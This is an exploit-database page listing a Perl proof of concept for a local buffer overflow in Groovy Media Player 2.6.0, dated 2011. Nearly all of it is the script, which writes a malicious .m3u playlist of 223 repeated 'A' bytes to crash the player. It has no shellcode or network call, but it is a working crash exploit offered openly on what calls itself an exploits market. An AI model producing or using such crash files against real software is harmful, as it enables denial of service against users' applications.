[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Groovy Media Player Version 2.6.0 (.m3u) Local Buffer Overflow PoC

Author
D3r K0n!G
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16763
Category
dos / poc
Date add
26-08-2011
Platform
windows
#!/usr/bin/perl
#####################################################################################
# Exploit Title: Groovy Media Player Version 2.6.0 (.m3u) Local Buffer Overflow PoC #
# Date: 26/08/2011														  			#
# Author: D3r K0n!G	                                                      			#
# Software Link: http://www.bestwebsharing.com/groovy-media-player                  #
# Category: Local Buffer Overflow PoC      											#
# Version: 2.6.0														  			#
# Tested on: Windows XP SP3												  			#
# CVE : N/A															      			#
#####################################################################################
#####################################################################################
#!/bin/usr/ZL4b!4                                                      			    #
#####################################################################################
my $file = "groovymp.m3u";
my $junk = "\x41" x 223;
open($FILE,">$file");
print $FILE $junk;
print "\nCrash.m3u file created successfully\n";
close($FILE);



#  0day.today [2024-11-16]  #